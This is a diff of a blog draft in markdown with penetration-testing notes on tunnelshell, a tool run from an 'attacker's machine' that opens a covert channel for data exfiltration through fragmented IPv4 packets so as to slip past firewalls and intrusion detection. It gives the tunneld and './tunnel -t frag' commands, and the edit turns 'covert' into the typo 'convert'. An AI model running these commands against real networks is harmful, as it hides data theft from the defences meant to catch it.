cotes2020/jekyll-theme-chirpy/_posts/00Basic/draft.md

   - sudo ./tunneld
   - (By default, it sends fragment packet, which reassembles at the destination to evade from firewall and IDS.)
-  To connect with tunnelshell, we need to execute the following command on the server (Attacker’s machine) which will establish a covert channel for data exfiltration.
+  To connect with tunnelshell, we need to execute the following command on the server (Attacker’s machine) which will establish a convert channel for data exfiltration.
   - ./tunnel -t frag 10.10.10.2
   - frag: It uses IPv4 fragmented packets to encapsulate data.
 When some routers and firewalls (like Cisco routers and default Linux installation) receives fragmented packets without headers for the fourth layer, they permit pass it even if they have a rule that denies it.